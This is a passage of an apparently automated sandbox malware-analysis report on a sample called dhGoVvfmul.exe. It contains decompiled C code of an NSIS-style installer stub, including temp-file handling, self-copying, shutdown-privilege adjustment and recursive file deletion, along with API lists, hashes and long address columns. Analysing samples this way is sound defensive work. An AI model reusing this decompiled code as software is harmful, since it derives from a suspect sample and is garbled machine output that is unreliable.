                          				_t250 = L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" " - _t233; // 0x22
                          				if(_t250 == 0) {
                          					_t216 = _t233;
                          					_t94 =  &M00435002;
                          				}
                          				_t198 = CharNextW(E00405E03(_t94, _t216));
                          				_v16 = _t198;
                          				while(1) {
                          					_t97 =  *_t198;
                          					_t251 = _t97 - _t188;
                          					if(_t97 == _t188) {
                          						break;
                          					}
                          					_t209 = 0x20;
                          					__eflags = _t97 - _t209;
                          					if(_t97 != _t209) {
                          						L17:
                          						__eflags =  *_t198 - _t233;
                          						_v12 = _t209;
                          						if( *_t198 == _t233) {
                          							_v12 = _t233;
                          							_t198 = _t198 + 2;
                          							__eflags = _t198;
                          						}
                          						__eflags =  *_t198 - 0x2f;
                          						if( *_t198 != 0x2f) {
                          							L32:
                          							_t198 = E00405E03(_t198, _v12);
                          							__eflags =  *_t198 - _t233;
                          							if(__eflags == 0) {
                          								_t198 = _t198 + 2;
                          								__eflags = _t198;
                          							}
                          							continue;
                          						} else {
                          							_t198 = _t198 + 2;
                          							__eflags =  *_t198 - 0x53;
                          							if( *_t198 != 0x53) {
                          								L24:
                          								asm("cdq");
                          								asm("cdq");
                          								_t214 = L"NCRC" & 0x0000ffff;
                          								asm("cdq");
                          								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                          								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                          								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                          									L29:
                          									asm("cdq");
                          									asm("cdq");
                          									_t209 = L" /D=" & 0x0000ffff;
                          									asm("cdq");
                          									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                          									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                          									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                          										L31:
                          										_t233 = 0x22;
                          										goto L32;
                          									}
                          									__eflags =  *_t198 - _t229;
                          									if( *_t198 == _t229) {
                          										 *(_t198 - 4) = _t188;
                          										__eflags = _t198;
                          										E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
                          										L37:
                          										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                          										GetTempPathW(0x400, _t234);
                          										_t116 = E004034C6(_t198, _t251);
                          										_t252 = _t116;
                          										if(_t116 != 0) {
                          											L40:
                          											DeleteFileW(L"1033"); // executed
                          											_t118 = E0040307D(_t254, _v20); // executed
                          											_v8 = _t118;
                          											if(_t118 != _t188) {
                          												L68:
                          												ExitProcess(); // executed
                          												__imp__OleUninitialize(); // executed
                          												if(_v8 == _t188) {
                          													if( *0x42a2b4 == _t188) {
                          														L77:
                          														_t119 =  *0x42a2cc;
                          														if(_t119 != 0xffffffff) {
                          															_v24 = _t119;
                          														}
                          														ExitProcess(_v24);
                          													}
                          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                          														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                          														_v40.PrivilegeCount = 1;
                          														_v28 = 2;
                          														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                          													}
                          													_t123 = E004068D4(4);
                          													if(_t123 == _t188) {
                          														L75:
                          														if(ExitWindowsEx(2, 0x80040002) != 0) {
                          															goto L77;
                          														}
                          														goto L76;
                          													} else {
                          														_push(0x80040002);
                          														_push(0x25);
                          														_push(_t188);
                          														_push(_t188);
                          														_push(_t188);
                          														if( *_t123() == 0) {
                          															L76:
                          															E0040140B(9);
                          															goto L77;
                          														}
                          														goto L75;
                          													}
                          												}
                          												E00405B67(_v8, 0x200010);
                          												ExitProcess(2);
                          											}
                          											if( *0x42a23c == _t188) {
                          												L51:
                          												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
                          												_v24 = E00403BB6(_t264);
                          												goto L68;
                          											}
                          											_t218 = E00405E03(L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ", _t188);
                          											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ") {
                          												L48:
                          												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ";
                          												_v8 = L"Error launching installer";
                          												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ") {
                          													_t189 = E00405AD2(__eflags);
                          													lstrcatW(_t234, L"~nsu");
                          													__eflags = _t189;
                          													if(_t189 != 0) {
                          														lstrcatW(_t234, "A");
                          													}
                          													lstrcatW(_t234, L".tmp");
                          													_t137 = lstrcmpiW(_t234, 0x436800);
                          													__eflags = _t137;
                          													if(_t137 == 0) {
                          														L67:
                          														_t188 = 0;
                          														__eflags = 0;
                          														goto L68;
                          													} else {
                          														__eflags = _t189;
                          														_push(_t234);
                          														if(_t189 == 0) {
                          															E00405AB5();
                          														} else {
                          															E00405A38();
                          														}
                          														SetCurrentDirectoryW(_t234);
                          														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                          														if(__eflags == 0) {
                          															E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x436800);
                          														}
                          														E00406507(0x42b000, _v16);
                          														_t201 = "A" & 0x0000ffff;
                          														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                          														__eflags = _t143;
                          														_v12 = 0x1a;
                          														 *0x42b800 = _t143;
                          														do {
                          															E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
                          															DeleteFileW(0x420ec8);
                          															__eflags = _v8;
                          															if(_v8 != 0) {
                          																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe", 0x420ec8, 1);
                          																__eflags = _t148;
                          																if(_t148 != 0) {
                          																	E004062C7(_t201, 0x420ec8, 0);
                          																	E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
                          																	_t152 = E00405AEA(0x420ec8);
                          																	__eflags = _t152;
                          																	if(_t152 != 0) {
                          																		CloseHandle(_t152);
                          																		_v8 = 0;
                          																	}
                          																}
                          															}
                          															 *0x42b800 =  *0x42b800 + 1;
                          															_t61 =  &_v12;
                          															 *_t61 = _v12 - 1;
                          															__eflags =  *_t61;
                          														} while ( *_t61 != 0);
                          														E004062C7(_t201, _t234, 0);
                          														goto L67;
                          													}
                          												}
                          												 *_t218 = _t188;
                          												_t221 =  &(_t218[2]);
                          												_t157 = E00405EDE(_t263,  &(_t218[2]));
                          												_t264 = _t157;
                          												if(_t157 == 0) {
                          													goto L68;
                          												}
                          												E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                          												E00406507(0x436000, _t221);
                          												_v8 = _t188;
                          												goto L51;
                          											}
                          											asm("cdq");
                          											asm("cdq");
                          											asm("cdq");
                          											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                          											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                          											while( *_t218 != _t204 || _t218[1] != _t167) {
                          												_t218 = _t218;
                          												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ") {
                          													continue;
                          												}
                          												break;
                          											}
                          											_t188 = 0;
                          											goto L48;
                          										}
                          										GetWindowsDirectoryW(_t234, 0x3fb);
                          										lstrcatW(_t234, L"\\Temp");
                          										_t170 = E004034C6(_t198, _t252);
                          										_t253 = _t170;
                          										if(_t170 != 0) {
                          											goto L40;
                          										}
                          										GetTempPathW(0x3fc, _t234);
                          										lstrcatW(_t234, L"Low");
                          										SetEnvironmentVariableW(L"TEMP", _t234);
                          										SetEnvironmentVariableW(L"TMP", _t234);
                          										_t175 = E004034C6(_t198, _t253);
                          										_t254 = _t175;
                          										if(_t175 == 0) {
                          											goto L68;
                          										}
                          										goto L40;
                          									}
                          									goto L31;
                          								}
                          								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                          								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                          									goto L29;
                          								}
                          								_t177 =  *((intOrPtr*)(_t198 + 8));
                          								__eflags = _t177 - 0x20;
                          								if(_t177 == 0x20) {
                          									L28:
                          									_t36 =  &_v20;
                          									 *_t36 = _v20 | 0x00000004;
                          									__eflags =  *_t36;
                          									goto L29;
                          								}
                          								__eflags = _t177 - _t188;
                          								if(_t177 != _t188) {
                          									goto L29;
                          								}
                          								goto L28;
                          							}
                          							_t178 =  *((intOrPtr*)(_t198 + 2));
                          							__eflags = _t178 - _t209;
                          							if(_t178 == _t209) {
                          								L23:
                          								 *0x42a2c0 = 1;
                          								goto L24;
                          							}
                          							__eflags = _t178 - _t188;
                          							if(_t178 != _t188) {
                          								goto L24;
                          							}
                          							goto L23;
                          						}
                          					} else {
                          						goto L16;
                          					}
                          					do {
                          						L16:
                          						_t198 = _t198 + 2;
                          						__eflags =  *_t198 - _t209;
                          					} while ( *_t198 == _t209);
                          					goto L17;
                          				}
                          				goto L37;
                          			}



















































                          0x00403505
                          0x00403506
                          0x0040350d
                          0x00403510
                          0x00403517
                          0x0040351a
                          0x0040352d
                          0x00403533
                          0x00403536
                          0x00403539
                          0x00403547
                          0x0040354f
                          0x0040355a
                          0x00403573
                          0x00403575
                          0x0040357d
                          0x0040357d
                          0x00403588
                          0x0040358a
                          0x0040358a
                          0x0040359f
                          0x004035c4
                          0x004035d2
                          0x004035d5
                          0x004035dc
                          0x004035e3
                          0x004035e3
                          0x004035dc
                          0x004035e5
                          0x004035ea
                          0x004035eb
                          0x004035f7
                          0x004035fb
                          0x00403602
                          0x00403610
                          0x00403615
                          0x0040361c
                          0x00403620
                          0x00403624
                          0x00403626
                          0x00403626
                          0x00403624
                          0x0040362d
                          0x00403634
                          0x0040363a
                          0x00403652
                          0x00403662
                          0x00403667
                          0x0040366d
                          0x00403674
                          0x0040367b
                          0x0040367d
                          0x0040367e
                          0x00403688
                          0x0040368f
                          0x00403691
                          0x00403693
                          0x00403693
                          0x004036a6
                          0x004036a8
                          0x004037a2
                          0x004037a2
                          0x004037a5
                          0x004037a8
                          0x00000000
                          0x00000000
                          0x004036b2
                          0x004036b3
                          0x004036b6
                          0x004036bf
                          0x004036bf
                          0x004036c2
                          0x004036c5
                          0x004036c8
                          0x004036cb
                          0x004036cb
                          0x004036cb
                          0x004036cc
                          0x004036d0
                          0x00403790
                          0x00403799
                          0x0040379b
                          0x0040379e
                          0x004037a1
                          0x004037a1
                          0x004037a1
                          0x00000000
                          0x004036d6
                          0x004036d7
                          0x004036d8
                          0x004036dc
                          0x004036f6
                          0x004036fd
                          0x00403710
                          0x00403711
                          0x00403726
                          0x0040372b
                          0x0040372d
                          0x0040372f
                          0x0040374b
                          0x00403752
                          0x00403765
                          0x00403766
                          0x0040377b
                          0x00403781
                          0x00403783
                          0x00403785
                          0x0040378d
                          0x0040378f
                          0x00000000
                          0x0040378f
                          0x00403789
                          0x0040378b
                          0x004037b0
                          0x004037b4
                          0x004037bd
                          0x004037c2
                          0x004037c8
                          0x004037d3
                          0x004037d5
                          0x004037da
                          0x004037dc
                          0x00403834
                          0x00403839
                          0x00403842
                          0x00403849
                          0x0040384c
                          0x00403a23
                          0x00403a23
                          0x00403a28
                          0x00403a31
                          0x00403a4e
                          0x00403ac6
                          0x00403ac6
                          0x00403ace
                          0x00403ad0
                          0x00403ad0
                          0x00403ad6
                          0x00403ad6
                          0x00403a65
                          0x00403a71
                          0x00403a82
                          0x00403a89
                          0x00403a90
                          0x00403a90
                          0x00403a98
                          0x00403aa4
                          0x00403ab2
                          0x00403abd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403aa6
                          0x00403aa6
                          0x00403aa7
                          0x00403aa9
                          0x00403aaa
                          0x00403aab
                          0x00403ab0
                          0x00403abf
                          0x00403ac1
                          0x00000000
                          0x00403ac1
                          0x00000000
                          0x00403ab0
                          0x00403aa4
                          0x00403a3b
                          0x00403a42
                          0x00403a42
                          0x00403858
                          0x004038ff
                          0x004038ff
                          0x0040390b
                          0x00000000
                          0x0040390b
                          0x00403869
                          0x00403871
                          0x004038c3
                          0x004038c3
                          0x004038c9
                          0x004038d0
                          0x0040391e
                          0x00403920
                          0x00403925
                          0x00403927
                          0x0040392f
                          0x0040392f
                          0x0040393a
                          0x00403946
                          0x0040394c
                          0x0040394e
                          0x00403a21
                          0x00403a21
                          0x00403a21
                          0x00000000
                          0x00403954
                          0x00403954
                          0x00403956
                          0x00403957
                          0x00403960
                          0x00403959
                          0x00403959
                          0x00403959
                          0x00403966
                          0x0040396e
                          0x00403975
                          0x0040397d
                          0x0040397d
                          0x0040398a
                          0x00403996
                          0x004039a0
                          0x004039a0
                          0x004039a2
                          0x004039a9
                          0x004039b3
                          0x004039bf
                          0x004039c5
                          0x004039cb
                          0x004039ce
                          0x004039d8
                          0x004039de
                          0x004039e0
                          0x004039e4
                          0x004039f5
                          0x004039fb
                          0x00403a00
                          0x00403a02
                          0x00403a05
                          0x00403a0b
                          0x00403a0b
                          0x00403a02
                          0x004039e0
                          0x00403a0e
                          0x00403a15
                          0x00403a15
                          0x00403a15
                          0x00403a15
                          0x00403a1c
                          0x00000000
                          0x00403a1c
                          0x0040394e
                          0x004038d2
                          0x004038d5
                          0x004038d9
                          0x004038de
                          0x004038e0
                          0x00000000
                          0x00000000
                          0x004038ec
                          0x004038f7
                          0x004038fc
                          0x00000000
                          0x004038fc
                          0x0040387a
                          0x00403892
                          0x004038a3
                          0x004038a4
                          0x004038a8
                          0x004038aa
                          0x004038b8
                          0x004038bf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004038bf
                          0x004038c1
                          0x00000000
                          0x004038c1
                          0x004037e4
                          0x004037f0
                          0x004037f5
                          0x004037fa
                          0x004037fc
                          0x00000000
                          0x00000000
                          0x00403804
                          0x0040380c
                          0x0040381d
                          0x00403825
                          0x00403827
                          0x0040382c
                          0x0040382e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040382e
                          0x00000000
                          0x0040378b
                          0x00403734
                          0x00403736
                          0x00000000
                          0x00000000
                          0x00403738
                          0x0040373c
                          0x00403740
                          0x00403747
                          0x00403747
                          0x00403747
                          0x00403747
                          0x00000000
                          0x00403747
                          0x00403742
                          0x00403745
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403745
                          0x004036de
                          0x004036e2
                          0x004036e5
                          0x004036ec
                          0x004036ec
                          0x00000000
                          0x004036ec
                          0x004036e7
                          0x004036ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004036ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004036b8
                          0x004036b8
                          0x004036b9
                          0x004036ba
                          0x004036ba
                          0x00000000
                          0x004036b8
                          0x00000000

                          APIs
                          • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                          • GetVersionExW.KERNEL32(?), ref: 00403543
                          • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                          • OleInitialize.OLE32(00000000), ref: 00403634
                          • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                          • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\dhGoVvfmul.exe" ,00000020,"C:\Users\user\Desktop\dhGoVvfmul.exe" ,00000000), ref: 004036A0
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                          • DeleteFileW.KERNELBASE(1033), ref: 00403839
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                            • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\dhGoVvfmul.exe" ,00000000,?), ref: 00403946
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                          • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\dhGoVvfmul.exe,00420EC8,00000001), ref: 004039D8
                          • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                          • ExitProcess.KERNEL32(?), ref: 00403A23
                          • OleUninitialize.OLE32(?), ref: 00403A28
                          • ExitProcess.KERNEL32 ref: 00403A42
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                          • ExitWindowsEx.USER32 ref: 00403AB5
                          • ExitProcess.KERNEL32 ref: 00403AD6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                          • String ID: "C:\Users\user\Desktop\dhGoVvfmul.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\dhGoVvfmul.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                          • API String ID: 2292928366-116862359
                          • Opcode ID: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                          • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                          • Opcode Fuzzy Hash: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                          • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 388 405c13-405c39 call 405ede 391 405c52-405c59 388->391 392 405c3b-405c4d DeleteFileW 388->392 394 405c5b-405c5d 391->394 395 405c6c-405c7c call 406507 391->395 393 405dcf-405dd3 392->393 396 405c63-405c66 394->396 397 405d7d-405d82 394->397 401 405c8b-405c8c call 405e22 395->401 402 405c7e-405c89 lstrcatW 395->402 396->395 396->397 397->393 400 405d84-405d87 397->400 403 405d91-405d99 call 40683d 400->403 404 405d89-405d8f 400->404 405 405c91-405c95 401->405 402->405 403->393 412 405d9b-405daf call 405dd6 call 405bcb 403->412 404->393 408 405ca1-405ca7 lstrcatW 405->408 409 405c97-405c9f 405->409 411 405cac-405cc8 lstrlenW FindFirstFileW 408->411 409->408 409->411 413 405d72-405d76 411->413 414 405cce-405cd6 411->414 428 405db1-405db4 412->428 429 405dc7-405dca call 405569 412->429 413->397 416 405d78 413->416 417 405cf6-405d0a call 406507 414->417 418 405cd8-405ce0 414->418 416->397 430 405d21-405d2c call 405bcb 417->430 431 405d0c-405d14 417->431 421 405ce2-405cea 418->421 422 405d55-405d65 FindNextFileW 418->422 421->417 427 405cec-405cf4 421->427 422->414 426 405d6b-405d6c FindClose 422->426 426->413 427->417 427->422 428->404 432 405db6-405dc5 call 405569 call 4062c7 428->432 429->393 441 405d4d-405d50 call 405569 430->441 442 405d2e-405d31 430->442 431->422 433 405d16-405d1f call 405c13 431->433 432->393 433->422 441->422 445 405d33-405d43 call 405569 call 4062c7 442->445 446 405d45-405d4b 442->446 445->422 446->422
                          C-Code - Quality: 98%
                          			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				short _v556;
                          				short _v558;
                          				struct _WIN32_FIND_DATAW _v604;
                          				signed int _t38;
                          				signed int _t52;
                          				signed int _t55;
                          				signed int _t62;
                          				void* _t64;
                          				signed char _t65;
                          				WCHAR* _t66;
                          				void* _t67;
                          				WCHAR* _t68;
                          				void* _t70;
                          
                          				_t65 = _a8;
                          				_t68 = _a4;
                          				_v8 = _t65 & 0x00000004;
                          				_t38 = E00405EDE(__eflags, _t68);
                          				_v12 = _t38;
                          				if((_t65 & 0x00000008) != 0) {
                          					_t62 = DeleteFileW(_t68); // executed
                          					asm("sbb eax, eax");
                          					_t64 =  ~_t62 + 1;
                          					 *0x42a2a8 =  *0x42a2a8 + _t64;
                          					return _t64;
                          				}
                          				_a4 = _t65;
                          				_t8 =  &_a4;
                          				 *_t8 = _a4 & 0x00000001;
                          				__eflags =  *_t8;
                          				if( *_t8 == 0) {
                          					L5:
                          					E00406507(0x425710, _t68);
                          					__eflags = _a4;
                          					if(_a4 == 0) {
                          						E00405E22(_t68);
                          					} else {
                          						lstrcatW(0x425710, L"\\*.*");
                          					}
                          					__eflags =  *_t68;
                          					if( *_t68 != 0) {
                          						L10:
                          						lstrcatW(_t68, 0x40a014);
                          						L11:
                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                          						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
                          						_t70 = _t38;
                          						__eflags = _t70 - 0xffffffff;
                          						if(_t70 == 0xffffffff) {
                          							L26:
                          							__eflags = _a4;
                          							if(_a4 != 0) {
                          								_t30 = _t66 - 2;
                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                          								__eflags =  *_t30;
                          							}
                          							goto L28;
                          						} else {
                          							goto L12;
                          						}
                          						do {
                          							L12:
                          							__eflags = _v604.cFileName - 0x2e;
                          							if(_v604.cFileName != 0x2e) {
                          								L16:
                          								E00406507(_t66,  &(_v604.cFileName));
                          								__eflags = _v604.dwFileAttributes & 0x00000010;
                          								if(__eflags == 0) {
                          									_t52 = E00405BCB(__eflags, _t68, _v8);
                          									__eflags = _t52;
                          									if(_t52 != 0) {
                          										E00405569(0xfffffff2, _t68);
                          									} else {
                          										__eflags = _v8 - _t52;
                          										if(_v8 == _t52) {
                          											 *0x42a2a8 =  *0x42a2a8 + 1;
                          										} else {
                          											E00405569(0xfffffff1, _t68);
                          											E004062C7(_t67, _t68, 0);
                          										}
                          									}
                          								} else {
                          									__eflags = (_a8 & 0x00000003) - 3;
                          									if(__eflags == 0) {
                          										E00405C13(__eflags, _t68, _a8);
                          									}
                          								}
                          								goto L24;
                          							}
                          							__eflags = _v558;
                          							if(_v558 == 0) {
                          								goto L24;
                          							}
                          							__eflags = _v558 - 0x2e;
                          							if(_v558 != 0x2e) {
                          								goto L16;
                          							}
                          							__eflags = _v556;
                          							if(_v556 == 0) {
                          								goto L24;
                          							}
                          							goto L16;
                          							L24:
                          							_t55 = FindNextFileW(_t70,  &_v604); // executed
                          							__eflags = _t55;
                          						} while (_t55 != 0);
                          						_t38 = FindClose(_t70); // executed
                          						goto L26;
                          					}
                          					__eflags =  *0x425710 - 0x5c;
                          					if( *0x425710 != 0x5c) {
                          						goto L11;
                          					}
                          					goto L10;
                          				} else {
                          					__eflags = _t38;
                          					if(_t38 == 0) {
                          						L28:
                          						__eflags = _a4;
                          						if(_a4 == 0) {
                          							L36:
                          							return _t38;
                          						}
                          						__eflags = _v12;
                          						if(_v12 != 0) {
                          							_t38 = E0040683D(_t68);
                          							__eflags = _t38;
                          							if(_t38 == 0) {
                          								goto L36;
                          							}
                          							E00405DD6(_t68);
                          							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
                          							__eflags = _t38;
                          							if(_t38 != 0) {
                          								return E00405569(0xffffffe5, _t68);
                          							}
                          							__eflags = _v8;
                          							if(_v8 == 0) {
                          								goto L30;
                          							}
                          							E00405569(0xfffffff1, _t68);
                          							return E004062C7(_t67, _t68, 0);
                          						}
                          						L30:
                          						 *0x42a2a8 =  *0x42a2a8 + 1;
                          						return _t38;
                          					}
                          					__eflags = _t65 & 0x00000002;
                          					if((_t65 & 0x00000002) == 0) {
                          						goto L28;
                          					}
                          					goto L5;
                          				}
                          			}


















                          0x00405c1d
                          0x00405c22
                          0x00405c2b
                          0x00405c2e
                          0x00405c36
                          0x00405c39
                          0x00405c3c
                          0x00405c44
                          0x00405c46
                          0x00405c47
                          0x00000000
                          0x00405c47
                          0x00405c52
                          0x00405c55
                          0x00405c55
                          0x00405c55
                          0x00405c59
                          0x00405c6c
                          0x00405c73
                          0x00405c78
                          0x00405c7c
                          0x00405c8c
                          0x00405c7e
                          0x00405c84
                          0x00405c84
                          0x00405c91
                          0x00405c95
                          0x00405ca1
                          0x00405ca7
                          0x00405cac
                          0x00405cb2
                          0x00405cbd
                          0x00405cc3
                          0x00405cc5
                          0x00405cc8
                          0x00405d72
                          0x00405d72
                          0x00405d76
                          0x00405d78
                          0x00405d78
                          0x00405d78
                          0x00405d78
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405cce
                          0x00405cce
                          0x00405cce
                          0x00405cd6
                          0x00405cf6
                          0x00405cfe
                          0x00405d03
                          0x00405d0a
                          0x00405d25
                          0x00405d2a
                          0x00405d2c
                          0x00405d50
                          0x00405d2e
                          0x00405d2e
                          0x00405d31
                          0x00405d45
                          0x00405d33
                          0x00405d36
                          0x00405d3e
                          0x00405d3e
                          0x00405d31
                          0x00405d0c
                          0x00405d12
                          0x00405d14
                          0x00405d1a
                          0x00405d1a
                          0x00405d14
                          0x00000000
                          0x00405d0a
                          0x00405cd8
                          0x00405ce0
                          0x00000000
                          0x00000000
                          0x00405ce2
                          0x00405cea
                          0x00000000
                          0x00000000
                          0x00405cec
                          0x00405cf4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405d55
                          0x00405d5d
                          0x00405d63
                          0x00405d63
                          0x00405d6c
                          0x00000000
                          0x00405d6c
                          0x00405c97
                          0x00405c9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c5b
                          0x00405c5b
                          0x00405c5d
                          0x00405d7d
                          0x00405d7f
                          0x00405d82
                          0x00405dd3
                          0x00405dd3
                          0x00405dd3
                          0x00405d84
                          0x00405d87
                          0x00405d92
                          0x00405d97
                          0x00405d99
                          0x00000000
                          0x00000000
                          0x00405d9c
                          0x00405da8
                          0x00405dad
                          0x00405daf
                          0x00000000
                          0x00405dca
                          0x00405db1
                          0x00405db4
                          0x00000000
                          0x00000000
                          0x00405db9
                          0x00000000
                          0x00405dc0
                          0x00405d89
                          0x00405d89
                          0x00000000
                          0x00405d89
                          0x00405c63
                          0x00405c66
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c66

                          APIs
